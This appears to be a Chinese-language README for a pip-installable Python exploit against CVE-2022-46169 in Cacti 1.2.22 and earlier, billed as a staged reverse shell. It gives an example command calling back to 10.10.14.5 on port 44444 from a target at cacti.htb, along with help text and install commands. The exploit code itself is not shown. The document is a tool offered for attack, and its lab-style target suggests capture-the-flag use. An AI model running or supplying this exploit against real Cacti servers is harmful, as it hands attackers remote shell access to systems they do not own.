🐍 CVE-2022-46169 的 Python 漏洞利用
适用于 Cacti <= 1.2.22 的分阶段反向 Shell
cve-2022-46169 10.10.14.5 44444 -u http://cacti.htb
usage: cve-2022-46169 [-h] -u URL [-s SHELL] ip port
positional arguments:
ip Shell 回调 IP 地址/主机名
port Shell 回调端口
options:
-h, --help 显示此帮助信息并退出
-u URL, --url URL Cacti 服务器 URL
-s SHELL, --shell SHELL
远程 Shell (默认: /bin/bash)
python3 -m pip install cve-2022-46169
python3 -m pip install cve-2022-46169-1.0.0-py3-none-any.whl